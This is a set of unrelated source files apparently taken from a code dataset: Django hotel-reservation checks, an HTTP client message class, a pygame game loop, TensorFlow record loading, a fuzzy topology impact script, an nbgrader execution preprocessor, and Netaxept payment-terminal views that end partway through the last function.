except HotelRoom.DoesNotExist:
return Error(
message=_("Room %(id)s not found") % {"id": order_room.room_id}
)
if room.is_sold_out:
return Error(
message=_("Room %(id)s is sold out") % {"id": order_room.room_id}
)
count = count_rooms.get(room.pk, 0)
if count + 1 > room.capacity_left:
return Error(message=_("Too many rooms") % {"id": order_room.room_id})
count_rooms[room.pk] = count + 1
if order_room.checkin < conference_start or order_room.checkin > conference_end:
return Error(message=_("Invaild check-in date"))
if (
order_room.checkout < conference_start
or order_room.checkout > conference_end
or order_room.checkin > order_room.checkout
):
return Error(message=_("Invaild check-out date"))
def create_hotel_reservations(
pretix_order: Order, hotel_rooms: typing.List[CreateOrderHotelRoom], user_id: int
):
for room in hotel_rooms:
HotelRoomReservation.objects.create(
room_id=room.room_id,
order_code=pretix_order.code,
checkin=room.checkin,
checkout=room.checkout,
user_id=user_id,
)
|
the-stack_106_23883 | class ClientMessage:
HTTP_VERSION="HTTP/1.1"
HTTP_HEADERS={
"Host": "cs5700sp17.ccs.neu.edu"
}
def __init__(self, method, URL, headers, body=""):
""" Init the variables of the client message """
self.method=method
self.URL=URL
self.body=body
self.version=ClientMessage.HTTP_VERSION
self.headers=ClientMessage.HTTP_HEADERS.copy()
self.headers.update(headers)
try:
self.headers["Content-length"]=len(body)
except:
raise ("No field called Content-length in client message")
def __str__(self):
"""Transfer the message into string to send to server"""
firstLine=""+str(self.method)+" "+str(self.URL)+" "+str(self.version)
headers=[]
for key in self.headers:
new_header_line=""+str(key)+":"+str(self.headers[key])
headers.append(new_header_line)
headersLines="\n".join(headers)
result="\n".join([firstLine,headersLines,"",self.body])
result+="\n"
return result
|
the-stack_106_23884 | '''Manages the game mechanics.'''
import random
import pygame
import pytmx
import pyscroll
import app
from pygame.constants import K_1, K_2
from characters import NinjaPlayer, NinjaEnemy, ArcherPlayer, ArcherEnemy, BanditPlayer, BanditEnemy, keymap1, keymap2
from items import LifePotionSmall, Axe, Bow, Knife, Sword, Portal
from collisions import get_collision_grid, get_positions_in_grid, get_objects_in_range
def update():
'''Makes the game seems alive and responsive.'''
global keys_pressed
keys_pressed = pygame.key.get_pressed() # Needed to handling keyboard and mouse events
# Processing inputs
process_inputs()
# Updating things in the game
render_group.update() #Updating the relative position of the entities to the camera.
update_collisions()
update_objects()
# If all players died, re-run last map
if len(players)==0: load_map(last_map_loaded, reset_players=True)
def update_objects():
for o in animated_objects:
o.update()
def process_inputs():
'''Input processing related to the game as a whole.'''
global keys_pressed
if keys_pressed[K_1]:
renderer.zoom *= 1.05
if keys_pressed[K_2]:
renderer.zoom /= 1.05
def update_collisions():
'''Updates collisions between sprites, in a completly unefficient way.'''
global hitboxes, collisionable_sprites
# Update collisions between characters
grid = get_collision_grid(collisionable_sprites, map)
for a in collisionable_sprites:
for b in get_objects_in_range(a, grid, map):
if a is b: continue
a.bounce(b)
b.bounce(a)
# Update hitboxes
for h in hitboxes:
for o in get_objects_in_range(h, grid, map):
if h.colliderect(o.feet_rect):
o.hitted(h)
# TODO: Restore this
hitboxes = list()
# Update collisions between characters and items
for b in touchable_objects:
b.set_animation('stand')
grid = get_collision_grid(touchable_objects, map)
for a in collisionable_sprites:
for b in get_objects_in_range(a, grid, map):
b.touched_by(a)
def draw():
'''Draws all the entities and the background.'''
app.screen.fill((0, 0, 0))
# center the map/screen on our Heroes
if len(players)>1:
center = ((players[0].rect.centerx + players[1].rect.centerx)*0.5,
(players[0].rect.centery+players[1].rect.centery)*0.5)
render_group.center(center)
elif len(players)==1:
render_group.center(players[0].rect.center)
else:
render_group.center((0,0))
# draw the map and all sprites
render_group._spritelist.sort(key=lambda x: x.feet_rect.centery) #Sorting sprites by depth.
render_group.draw(app.screen)
# Draw information about players' life, stamina, etc.
draw_players_info()
# # TODO: CLEAN THIS CODE WHEN DEBUGGING CHARACTERS IS NO LONGER NEEDED
# # Raw way of rendering things for debuging
# camx = -player1.rect.centerx+app.screen_width*0.5
# camy = -player1.rect.centery+app.screen_height*0.5
#
# for h in hitboxes:
# rect = (h.rect[0]+camx, h.rect[1]+camy, h.rect[2], h.rect[3])
# pygame.draw.rect(app.screen, (255, 0, 0), rect)
# hitboxes = list()
#
# for e in animated_objects:
# rect = (e.feet_rect[0]+camx, e.feet_rect[1]+camy, e.feet_rect[2], e.feet_rect[3])
# pygame.draw.rect(app.screen, (0, 255, 0), rect)
def draw_players_info():
render_group.center((0,0))
# Player 1 info
if len(players)>0:
pygame.draw.rect(app.screen, ( 0, 0, 0), (20, 20, 200, 20))
if players[0].life > 0: pygame.draw.rect(app.screen, (255, 0, 0), (23, 23, 194*max(0,players[0].life)/players[0].max_life, 14))
pygame.draw.rect(app.screen, ( 0, 0, 0), (20, 40, 200, 20))
pygame.draw.rect(app.screen, (255,255,255), (23, 43, 194*max(0,players[0].stamina)/players[0].max_stamina, 14))
# Player 2 info
if len(players)>1:
pygame.draw.rect(app.screen, ( 0, 0, 0), (app.screen_width-20-200, 20, 200, 20))
if players[1].life > 0: pygame.draw.rect(app.screen, (255, 0, 0), (app.screen_width-17-200, 23, 194*players[1].life/players[1].max_life, 14))
pygame.draw.rect(app.screen, ( 0, 0, 0), (app.screen_width-20-200, 40, 200, 20))
pygame.draw.rect(app.screen, (255,255,255), (app.screen_width-17-200, 43, 194*max(0, players[1].stamina)/players[1].max_stamina, 14))
# Loading main map
def load_map(path, reset_players=False):
global map, map_rect, renderer
global render_group, animated_objects, collisionable_sprites, hitboxes, touchable_objects, collisionable_walls, players, grid_collisionable_walls
global last_map_loaded
last_map_loaded = path
# Load the map
map = pytmx.util_pygame.load_pygame(path)
map_rect = (0, 0, map.width*map.tilewidth, map.height*map.tileheight)
# Load music and start playing it
if hasattr(map, 'music'):
pygame.mixer.music.load('data/music/' + map.music)
pygame.mixer.music.play(-1)
else:
pygame.mixer.music.stop()
# Creating global containers
renderer = pyscroll.BufferedRenderer(pyscroll.data.TiledMapData(map), app.screen.get_size()) # "Camera" of the game: it renders objects.'''
renderer.zoom = 1.5
render_group = pyscroll.group.PyscrollGroup(map_layer=renderer, default_layer=2) # This defines the group of renderizable sprites.
animated_objects = list() # Holds everything that needs to be updated by PygAnim.
collisionable_sprites = list() # Sprites that can collide between them
hitboxes = list() # Hitbox objects
touchable_objects = list()
# Creating objects of the map
# Walls
collisionable_walls = [pygame.Rect(o.x,o.y, o.width,o.height) for o in map.layernames['walls']] # This contains the walls of the map
grid_collisionable_walls = get_collision_grid(collisionable_walls, map, size=10) #Used for optimization
# Characters
old_players = players if players is not None else []
players = []
for map_object in map.layernames['characters']:
# Selecting keyboard
key = keymap1 if len(players) == 0 else keymap2
# Creating the object
if map_object.class_ninja == 'true':
if map_object.is_player == 'true':
new_character = NinjaPlayer(key)
players.append(new_character)
else:
new_character = NinjaEnemy()
elif map_object.class_archer == 'true':
if map_object.is_player == 'true':
new_character = ArcherPlayer(key)
players.append(new_character)
else:
new_character = ArcherEnemy()
elif map_object.class_bandit == 'true':
if map_object.is_player == 'true':
new_character = BanditPlayer(key)
players.append(new_character)
else:
new_character = BanditEnemy()
# Setting attributes
# Position
new_character.position = (map_object.x - 50, map_object.y - 45)
# Weapons
weapon_list = []
if map_object.weapon_unarmed == 'true': weapon_list.append('unarmed')
if map_object.weapon_knife == 'true': weapon_list.append('knife')
if map_object.weapon_sword == 'true': weapon_list.append('sword')
if map_object.weapon_axe == 'true': weapon_list.append('axe')
if map_object.weapon_bow == 'true': weapon_list.append('bow')
if len(weapon_list)>0:
new_character.weapon = random.choice(weapon_list)
else:
new_character.weapon = 'unarmed'
# Things for NPCs:
if map_object.is_player == 'false':
# Wandering zones
new_character.territory_radius = float(map_object.territory_radius) * map.tilewidth
# Patroling zones (for NPCs):
if hasattr(map_object, 'points'):
new_character.path = list()
for p in map_object.points:
new_character.path.append((p[0], p[1]))
new_character.position = (new_character.path[0][0]-50, new_character.path[0][1]-45)
if not reset_players:
for idx, player in enumerate(players):
if idx < len(old_players):
player.weapon = old_players[idx].weapon
player.life = old_players[idx].life
# Creating items
for map_object in map.layernames['items']:
# Creating the object
item_classes = list()
if map_object.class_life_small == 'true': item_classes.append(LifePotionSmall)
if map_object.class_axe == 'true': item_classes.append(Axe)
if map_object.class_bow == 'true': item_classes.append(Bow)
if map_object.class_knife == 'true': item_classes.append(Knife)
if map_object.class_sword == 'true': item_classes.append(Sword)
if len(item_classes)>0: random.choice(item_classes)((map_object.x - 35, map_object.y - 25))
# Creating portals
if 'portals' in map.layernames:
for map_object in map.layernames['portals']:
p = Portal((map_object.x - 35, map_object.y - 25))
p.to_map = map_object.to_map
# Global objects
keys_pressed = {}
# The game mechanics is updating.
active = False
# The game graphics are visible.
visible = True
# Map related objects
map = map_rect = renderer = render_group = animated_objects = collisionable_sprites = hitboxes = touchable_objects = \
collisionable_walls = grid_collisionable_walls = players = last_map_loaded = None
|
the-stack_106_23885 | """Import data from tensorflow format."""
# Copyright 2019 CSIRO (Data61)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
from glob import glob
from typing import Callable, Dict, Iterator, List, NamedTuple, Optional, Tuple, Union
import numpy as np
import tensorflow as tf
from landshark.metadata import FeatureSet, Target, Training
from landshark.serialise import deserialise
from landshark.util import points_per_batch
log = logging.getLogger(__name__)
def dataset_fn(
records: List[str],
batchsize: int,
features: FeatureSet,
targets: Optional[Target] = None,
epochs: int = 1,
take: int = -1,
shuffle: bool = False,
shuffle_buffer: int = 1000,
random_seed: Optional[int] = None,
) -> Callable[[], tf.data.TFRecordDataset]:
"""Dataset feeder."""
def f() -> tf.data.TFRecordDataset:
dataset = tf.data.TFRecordDataset(records, compression_type="ZLIB").repeat(
count=epochs
)
if shuffle:
dataset = dataset.shuffle(buffer_size=shuffle_buffer, seed=random_seed)
dataset = (
dataset.take(take)
.batch(batchsize)
.map(lambda x: deserialise(x, features, targets))
)
return dataset
return f
def get_training_meta(directory: str) -> Tuple[Training, List[str], List[str]]:
"""Read train/test metadata and record filenames from dir."""
test_dir = os.path.join(directory, "testing")
training_records = glob(os.path.join(directory, "*.tfrecord"))
testing_records = glob(os.path.join(test_dir, "*.tfrecord"))
metadata = Training.load(directory)
return metadata, training_records, testing_records
def get_query_meta(query_dir: str) -> Tuple[FeatureSet, List[str], int, int]:
"""Read query metadata and record filenames from dir."""
strip_list = query_dir.rstrip("/").split("strip")[-1].split("of")
assert len(strip_list) == 2
strip = int(strip_list[0])
nstrip = int(strip_list[1])
query_metadata = FeatureSet.load(query_dir)
query_records = glob(os.path.join(query_dir, "*.tfrecord"))
query_records.sort()
return query_metadata, query_records, strip, nstrip
def _make_mask(
x: Dict[str, np.ndarray], xm: Dict[str, np.ndarray]
) -> Dict[str, np.ma.MaskedArray]:
"""Combine arrays and masks to MaskedArray's."""
assert x.keys() == xm.keys()
d = {k: np.ma.MaskedArray(data=x[k], mask=xm[k]) for k in x.keys()}
return d
TData = Dict[str, Union[np.ndarray, Dict[str, np.ndarray]]]
class XData(NamedTuple):
"""Container for covariate data X."""
x_con: Optional[Dict[str, np.ma.MaskedArray]]
x_cat: Optional[Dict[str, np.ma.MaskedArray]]
indices: np.ndarray
coords: np.ndarray
class XYData(NamedTuple):
"""Container for covariate X and target data Y."""
x_con: Optional[Dict[str, np.ma.MaskedArray]]
x_cat: Optional[Dict[str, np.ma.MaskedArray]]
indices: np.ndarray
coords: np.ndarray
y: Dict[str, np.ndarray]
def _split(X: TData) -> XData:
"""Split dict into elements."""
Xcon = _make_mask(X["con"], X["con_mask"]) if "con" in X else None
Xcat = _make_mask(X["cat"], X["cat_mask"]) if "cat" in X else None
return XData(Xcon, Xcat, X["indices"], X["coords"])
def _concat_dict(xlist: List[TData]) -> TData:
"""Join dicts of arrays together."""
out_dict = {}
for k, v in xlist[0].items():
if tf.is_tensor(v):
out_dict[k] = np.concatenate([di[k] for di in xlist], axis=0)
else:
out_dict[k] = _concat_dict([di[k] for di in xlist])
return out_dict
def extract_split_xy(dataset: tf.data.TFRecordDataset) -> XYData:
"""Extract (X, Y) data from tensor dataset and split."""
x_list, y_list = zip(*dataset)
Y = np.concatenate(y_list, axis=0)
X = _concat_dict(x_list)
x_con, x_cat, indices, coords = _split(X)
return XYData(x_con, x_cat, indices, coords, Y)
def xy_record_data(
records: List[str],
metadata: Training,
batchsize: int = 1000,
npoints: int = -1,
shuffle: bool = False,
shuffle_buffer: int = 1000,
random_seed: Optional[int] = None,
) -> XYData:
"""Read train/test record."""
train_dataset = dataset_fn(
records=records,
batchsize=batchsize,
features=metadata.features,
targets=metadata.targets,
take=npoints,
shuffle=shuffle,
shuffle_buffer=shuffle_buffer,
random_seed=random_seed,
)()
xy_data_tuple = extract_split_xy(train_dataset)
return xy_data_tuple
def query_data_it(
records: List[str],
features: FeatureSet,
batchsize: int,
npoints: int = -1,
shuffle: bool = False,
shuffle_buffer: int = 1000,
random_seed: Optional[int] = None,
) -> Iterator[XData]:
"""Exctract query data from tfrecord in batches."""
dataset = dataset_fn(
records=records,
batchsize=batchsize,
features=features,
take=npoints,
shuffle=shuffle,
shuffle_buffer=shuffle_buffer,
random_seed=random_seed,
)()
for X in dataset:
yield _split(X)
#
# functions for inspecting tfrecord data directly
#
def read_train_record(
directory: str,
npoints: int = -1,
shuffle: bool = False,
shuffle_buffer: int = 1000,
random_seed: Optional[int] = None,
) -> XYData:
"""Read train record."""
metadata, train_records, _ = get_training_meta(directory)
train_data_tuple = xy_record_data(
records=train_records,
metadata=metadata,
npoints=npoints,
shuffle=shuffle,
shuffle_buffer=shuffle_buffer,
random_seed=random_seed,
)
return train_data_tuple
def read_test_record(
directory: str,
npoints: int = -1,
shuffle: bool = False,
shuffle_buffer: int = 1000,
random_seed: Optional[int] = None,
) -> XYData:
"""Read test record."""
metadata, _, test_records = get_training_meta(directory)
test_data_tuple = xy_record_data(
records=test_records,
metadata=metadata,
npoints=npoints,
shuffle=shuffle,
shuffle_buffer=shuffle_buffer,
random_seed=random_seed,
)
return test_data_tuple
def read_query_record(
query_dir: str,
batch_mb: float,
npoints: int = -1,
shuffle: bool = False,
shuffle_buffer: int = 1000,
random_seed: Optional[int] = None,
) -> Iterator[XData]:
"""Read query data in batches."""
features, records, strip, nstrip = get_query_meta(query_dir)
batchsize = points_per_batch(features, batch_mb)
yield from query_data_it(
records=records,
features=features,
batchsize=batchsize,
npoints=npoints,
shuffle=shuffle,
shuffle_buffer=shuffle_buffer,
random_seed=random_seed,
)
|
the-stack_106_23887 | # Copyright 2019 Julian Niedermeier & Goncalo Mordido
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import time
import matplotlib.pyplot as plt
import numba
import numpy as np
import scipy.sparse
import seaborn as sns
from skimage.util.dtype import img_as_float64
from sklearn.metrics import pairwise_distances
from misc import images, util
from metrics.fuzzy_topology_impact import fuzzy_topology_impact
sns.set(context="paper", style="white")
if __name__ == "__main__":
parser = argparse.ArgumentParser(formatter_class=util.HelpFormatter)
parser.add_argument(
"-train",
type=str,
default=None,
required=True,
help="Path to a .npy file with train dataset.",
)
parser.add_argument(
"-test",
type=str,
default=None,
required=True,
help="Path to a .npy file with test dataset.",
)
parser.add_argument(
"-savefile",
type=str,
default=None,
required=True,
help="Name of the output file.",
)
# UMAP
parser.add_argument(
"-k", type=int, default=20, help="n_neighbor parameter for UMAP."
)
parser.add_argument(
"-metric", type=str, default="euclidean", help="metric parameter for UMAP."
)
parser.add_argument(
"-local_connectivity",
type=float,
default=0.0,
help="local_connectivity parameter for UMAP.",
)
# Noise
parser.add_argument(
"-noise_target",
type=str,
choices=["train", "test"],
default=None,
help="To which data the noise is applied.",
)
parser.add_argument(
"-noise",
type=str,
choices=["blur", "gaussian", "sap", "swirl"],
default=None,
help="Type of noise to apply to test images. 'sap' is Salt & Pepper.",
)
parser.add_argument(
"-image_shape",
type=str,
default=None,
help="Required if noise is set. Specifies width,height,channel.",
)
parser.add_argument(
"-noise_amount",
type=float,
default=None,
help="Standard deviation for blur, variance for noise, proportion of pixels "
"for s&p, strength for swirl.",
)
parser.add_argument(
"-noise_radius", type=float, default=None, help="Radius of swirl."
)
# Misc
parser.add_argument(
"-cache",
type=str,
default=None,
help="Cache directory for train distance matrix. Does not cache, if not specified.",
)
parser.add_argument(
"-save_images",
action="store_true",
help="If set, will save test and train image originals and noised versions.",
)
parser.add_argument(
"-no_timestamp",
action="store_true",
help="If set, disables adding '.time[timestamp]' to -savefile",
)
parser.add_argument(
"-dont_use_noise_args",
action="store_true",
help="If set, will not use all the noise arguments to add noise to the input data but will save the argument values in the .npz archive.",
)
# Labels
parser.add_argument(
"-train_labels",
type=str,
default=None,
help="Path to a .npy file with labels for -train.",
)
parser.add_argument(
"-allowed_train_labels",
nargs="+",
type=int,
default=None,
help="List of label IDs to pick from -train_labels. Data in -train_labels "
"not matching these labels will be discarded.",
)
parser.add_argument(
"-test_labels",
type=str,
default=None,
help="Path to a .npy file with labels for -test.",
)
parser.add_argument(
"-allowed_test_labels",
nargs="+",
type=int,
default=None,
help="List of label IDs to pick from -test_labels. Data in -test_labels "
"not matching these labels will be discarded.",
)
parser.add_argument(
"-sample_train",
type=int,
default=None,
help="If set, will randomly pick that many samples from the train set.",
)
parser.add_argument(
"-sample_test",
type=int,
default=None,
help="If set, will randomly pick that many samples from the test set.",
)
parser.add_argument("-seed", type=int, default=None, help="A seed for numpy.")
args = parser.parse_args()
np.random.seed(args.seed)
os.makedirs(os.path.dirname(args.savefile), exist_ok=True)
print("Loading Data")
print("- train:", args.train)
print("- test:", args.test)
train = np.load(args.train)
test = np.load(args.test)
if args.sample_train:
train = train[
np.random.choice(train.shape[0], args.sample_train, replace=False)
]
if args.sample_test:
test = test[np.random.choice(test.shape[0], args.sample_test, replace=False)]
original_train_dtype = train.dtype
original_test_dtype = test.dtype
assert train.dtype == test.dtype
assert train.shape[1:] == test.shape[1:]
if np.ndim(train) > 2:
train = np.reshape(train, (train.shape[0], -1))
if np.ndim(test) > 2:
test = np.reshape(test, (test.shape[0], -1))
if not args.no_timestamp:
args.savefile = f"{args.savefile}.time[{time.time()}]"
print("Save Path:", args.savefile)
if args.train_labels:
if args.allowed_train_labels is None:
parser.error(
"When -train_labels is set you have to also specify -allowed_train_labels"
)
if args.cache:
print(
"WARNING: Using -cache and -train_labels might have unexpected effects!"
)
train_labels = np.load(args.train_labels).astype(np.int64)
unique_train_labels = np.unique(train_labels)
if train_labels.shape[0] != train.shape[0]:
raise ValueError("Shape[0] of -train_labels and -train do not match")
allowed_train_labels = np.unique(args.allowed_train_labels)
if not np.isin(allowed_train_labels, unique_train_labels).all():
raise ValueError("Not all -allowed_train_labels are in -train_labels")
train_label_indices = np.where(np.isin(train_labels, allowed_train_labels))
original_train_shape = train.shape
train = train[train_label_indices]
print(f"Selected {train.shape[0]} elements from -train")
if args.test_labels:
if args.allowed_test_labels is None:
parser.error(
"When -test_labels is set you have to also specify -allowed_test_labels"
)
test_labels = np.load(args.test_labels).astype(np.int64)
unique_test_labels = np.unique(test_labels)
if test_labels.shape[0] != test.shape[0]:
raise ValueError("Shape[0] of -test_labels and -test do not match")
allowed_test_labels = np.unique(args.allowed_test_labels)
if not np.isin(allowed_test_labels, unique_test_labels).all():
raise ValueError("Not all -allowed_test_labels are in -test_labels")
test_label_indices = np.where(np.isin(test_labels, allowed_test_labels))
original_test_shape = test.shape
test = test[test_label_indices]
print(f"Selected {test.shape[0]} elements from -test")
if args.noise:
if args.noise_amount is None:
parser.error("When -noise is set you have to also set -noise_amount")
if args.noise == "swirl" and args.noise_radius is None:
parser.error("When -noise=swirl you have to also set -noise_radius.")
if args.noise and not args.dont_use_noise_args:
if args.noise_target == "train":
target = train
other_target = "test"
other = test
else:
target = test
other_target = "train"
other = train
if not (other.min() >= -1.0 and other.max() <= 1.0):
if other.dtype == np.uint8:
other = img_as_float64(other)
else:
other /= 255.0
if not (other.min() >= -1.0 and other.max() <= 1.0):
raise ValueError(
f"{other_target} data cannot be normalized to range [-1, 1]"
)
if args.image_shape is None:
parser.error("When -noise is set you have to also set -image_shape.")
w, h, c = [int(n) for n in args.image_shape.split(",")]
print(f"Distorting {args.noise_target} Images")
distorted_images = np.empty(target.shape, dtype=np.float64)
image_shape = (w, h) if c == 1 else (w, h, c)
cmap = None if c > 1 else "gray"
for i, image in enumerate(target):
image = image.reshape(image_shape)
if i == 0:
if args.save_images:
plt.imshow(image, cmap=cmap)
plt.savefig(f"{args.savefile}.{args.noise_target}_original.png")
plt.imshow(other[0].reshape(image_shape), cmap=cmap)
plt.savefig(f"{args.savefile}.{other_target}_original.png")
if args.noise == "blur":
image = images.apply_gaussian_blur(image, args.noise_amount)
elif args.noise == "gaussian":
image = images.apply_gaussian_noise(image, args.noise_amount)
elif args.noise == "sap":
image = images.apply_salt_and_pepper(image, args.noise_amount)
else:
image = images.apply_swirl(image, args.noise_amount, args.noise_radius)
if i == 0 and args.save_images:
plt.imshow(image, cmap=cmap)
plt.savefig(f"{args.savefile}.{args.noise_target}.png")
distorted_images[i] = image.reshape(-1)
if args.noise_target == "train":
train = distorted_images
test = other
else:
test = distorted_images
train = other
elif (
(train.min() >= 0 and train.max() <= 255)
and (test.min() >= 0 and test.max() <= 255)
and train.dtype == np.uint8
):
print("Data could be uint8 images. Converting to float64 in range [0,1]")
train = img_as_float64(train)
test = img_as_float64(test)
elif train.dtype == np.float32 or test.dtype == np.float32:
print("Detected train or test float32. Casting both to float64")
train = train.astype(np.float64)
test = test.astype(np.float64)
print("Data Statistics:")
print("----------------")
print("Train")
if args.train_labels:
print("- Original Shape:", original_train_shape)
print("- Shape:", train.shape)
if original_train_dtype != train.dtype:
print("- Original Dtype:", original_train_dtype)
if args.allowed_train_labels is not None:
print("- Allowed Labels:", args.allowed_train_labels)
print("- Dtype:", train.dtype)
print("- Min:", train.min())
print("- Max:", train.max())
print("- Noise:", "True" if args.noise_target == "train" else "False")
print("- Labels:", "True" if args.train_labels else "False")
print("Test")
if args.test_labels:
print("- Original Shape:", original_test_shape)
print("- Shape:", test.shape)
if original_test_dtype != test.dtype:
print("- Original Dtype:", original_test_dtype)
if args.allowed_test_labels is not None:
print("- Allowed Labels:", args.allowed_test_labels)
print("- Dtype:", test.dtype)
print("- Min:", test.min())
print("- Max:", test.max())
print("- Noise:", "True" if args.noise_target == "test" else "False")
print("- Labels:", "True" if args.test_labels else "False")
if args.cache:
train_dmat_cache_file = os.path.join(
args.cache, f"{os.path.basename(args.train)}.train_dmat.npy"
)
print("Cache:", train_dmat_cache_file)
os.makedirs(args.cache, exist_ok=True)
if not os.path.exists(train_dmat_cache_file):
print("Computing TRAIN dmat")
train_dmat = pairwise_distances(train, metric=args.metric)
np.save(train_dmat_cache_file, train_dmat)
else:
print("Loading TRAIN dmat")
train_dmat = np.load(train_dmat_cache_file)
else:
train_dmat = None
print("Computing Fuzzy Topology Impact")
s = time.time()
impact, P_X, P_X_Xprime_minus_xprime, fs_set_X_size = fuzzy_topology_impact(
train, test, args.k, args.metric, args.local_connectivity, train_dmat
)
e = time.time()
print(f"Computed impact {impact} for {test.shape[0]} samples in {e-s} seconds")
additional_save_data = {
"k": args.k,
"metric": args.metric,
"local_connectivity": args.local_connectivity,
}
if args.allowed_train_labels:
additional_save_data["original_train_labels"] = unique_train_labels
additional_save_data["allowed_train_labels"] = allowed_train_labels
if args.allowed_test_labels:
additional_save_data["original_test_labels"] = unique_test_labels
additional_save_data["allowed_test_labels"] = allowed_test_labels
if args.noise_target:
additional_save_data[f"{args.noise_target}_noise"] = args.noise
additional_save_data[f"{args.noise_target}_noise_amount"] = args.noise_amount
if args.noise == "swirl":
additional_save_data[
f"{args.noise_target}_noise_radius"
] = args.noise_radius
if args.sample_train:
additional_save_data["sample_train"] = args.sample_train
if args.sample_test:
additional_save_data["sample_test"] = args.sample_test
np.savez_compressed(
args.savefile,
impact=impact,
P_X=P_X,
P_X_Xprime_minus_xprime=P_X_Xprime_minus_xprime,
fs_set_X_size=fs_set_X_size,
**additional_save_data,
)
|
the-stack_106_23888 | from nbconvert.preprocessors import ExecutePreprocessor, CellExecutionError
from traitlets import Bool, List, Integer
from textwrap import dedent
from . import NbGraderPreprocessor
from nbconvert.exporters.exporter import ResourcesDict
from nbformat.notebooknode import NotebookNode
from typing import Any, Optional, Tuple
class UnresponsiveKernelError(Exception):
pass
class Execute(NbGraderPreprocessor, ExecutePreprocessor):
interrupt_on_timeout = Bool(True)
allow_errors = Bool(True)
raise_on_iopub_timeout = Bool(True)
extra_arguments = List([], help=dedent(
"""
A list of extra arguments to pass to the kernel. For python kernels,
this defaults to ``--HistoryManager.hist_file=:memory:``. For other
kernels this is just an empty list.
""")
).tag(config=True)
execute_retries = Integer(0, help=dedent(
"""
The number of times to try re-executing the notebook before throwing
an error. Generally, this shouldn't need to be set, but might be useful
for CI environments when tests are flaky.
""")
).tag(config=True)
def preprocess(self,
nb: NotebookNode,
resources: ResourcesDict,
retries: Optional[Any] = None
) -> Tuple[NotebookNode, ResourcesDict]:
# This gets added in by the parent execute preprocessor, so if it's already in our
# extra arguments we need to delete it or traitlets will be unhappy.
if '--HistoryManager.hist_file=:memory:' in self.extra_arguments:
self.extra_arguments.remove('--HistoryManager.hist_file=:memory:')
if retries is None:
retries = self.execute_retries
try:
output = super(Execute, self).preprocess(nb, resources)
except RuntimeError:
if retries == 0:
raise UnresponsiveKernelError()
else:
self.log.warning("Failed to execute notebook, trying again...")
return self.preprocess(nb, resources, retries=retries - 1)
return output
def preprocess_cell(self, cell, resources, cell_index, store_history=True):
"""
Need to override preprocess_cell to check reply for errors
"""
# Copied from nbconvert ExecutePreprocessor
if cell.cell_type != 'code' or not cell.source.strip():
return cell, resources
reply, outputs = self.run_cell(cell, cell_index, store_history)
# Backwards compatibility for processes that wrap run_cell
cell.outputs = outputs
cell_allows_errors = (self.allow_errors or "raises-exception"
in cell.metadata.get("tags", []))
if self.force_raise_errors or not cell_allows_errors:
if (reply is not None) and reply['content']['status'] == 'error':
raise CellExecutionError.from_cell_and_msg(cell, reply['content'])
# Ensure errors are recorded to prevent false positives when autograding
if (reply is None) or reply['content']['status'] == 'error':
error_recorded = False
for output in cell.outputs:
if output.output_type == 'error':
error_recorded = True
if not error_recorded:
error_output = NotebookNode(output_type='error')
if reply is None:
# Occurs when
# IPython.core.interactiveshell.InteractiveShell.showtraceback
# = None
error_output.ename = "CellTimeoutError"
error_output.evalue = ""
error_output.traceback = ["ERROR: No reply from kernel"]
else:
# Occurs when
# IPython.core.interactiveshell.InteractiveShell.showtraceback
# = lambda *args, **kwargs : None
error_output.ename = reply['content']['ename']
error_output.evalue = reply['content']['evalue']
error_output.traceback = reply['content']['traceback']
if error_output.traceback == []:
error_output.traceback = ["ERROR: An error occurred while"
" showtraceback was disabled"]
cell.outputs.append(error_output)
return cell, resources
|
the-stack_106_23889 | """
Example views for interactive testing of payment with netaxept.
"""
from django.http import HttpRequest
from django.http import HttpResponse
from django.shortcuts import redirect, get_object_or_404
from django.template.response import TemplateResponse
from django.urls import path
from django.views.decorators.http import require_GET
from structlog import get_logger
from payment import get_payment_gateway
from payment.gateways.netaxept import actions
from payment.gateways.netaxept import gateway_to_netaxept_config
from payment.gateways.netaxept import netaxept_protocol
from payment.models import Payment
from payment.utils import gateway_authorize
logger = get_logger()
@require_GET
def register_and_goto_terminal(request: HttpRequest, payment_id: int) -> HttpResponse:
"""
Register the payment with netaxept, and take the user to the terminal page for payment authorization.
"""
logger.info('netaxept-register-and-goto-terminal', payment_id=payment_id)
payment = get_object_or_404(Payment, id=payment_id)
transaction_id = actions.register_payment(payment)
payment_gateway, gateway_config = get_payment_gateway(payment.gateway)
netaxept_config = gateway_to_netaxept_config(gateway_config)
return redirect(netaxept_protocol.get_payment_terminal_url(config=netaxept_config, transaction_id=transaction_id))
@require_GET
def after_terminal(request):
"""
The browser gets redirected here when the user finishes interacting with the netaxept terminal pages.
We expect query-string parameters: transactionId and responseCode.
https://shop.nets.eu/web/partners/response-codes
Note that it is very easy for a user to invoke this endpoint himself (by looking at the parameters of the
netaxept terminal in order to pretend that he paid.
This is why we verify the state of the payment by calling netaxept.
Assumptions: We expect the terminal to have been opened with AuthAuth set to True.
"""
transaction_id = request.GET['transactionId']
response_code = request.GET['responseCode']
logger.info('netaxept-after-terminal', transaction_id=transaction_id, response_code=response_code)
if response_code == 'Cancel':
return HttpResponse('Payment cancelled')
elif response_code == 'OK':
payment = Payment.objects.get(token=transaction_id)
try:
# This will verify if the payment was indeed authorized.
gateway_authorize(payment=payment, payment_token=payment.token)
except Exception as exc:
logger.error('netaxept-after-terminal-error', exc_info=exc)
return HttpResponse('Error authorizing {}: {}'.format(payment.id, exc))
else:
return redirect('view_payment', payment_id=payment.id)
else: # The error case
payment = Payment.objects.get(token=transaction_id)
try:
# This will query the state of the payment in netaxept, and create a transaction object with all details
gateway_authorize(payment=payment, payment_token=payment.token)
finally:
return HttpResponse('Payment error {}'.format(response_code))
def query(request: HttpRequest, transaction_id: str) -> HttpResponse:
"""
Retries the status of the given transaction from netaxept.
"""
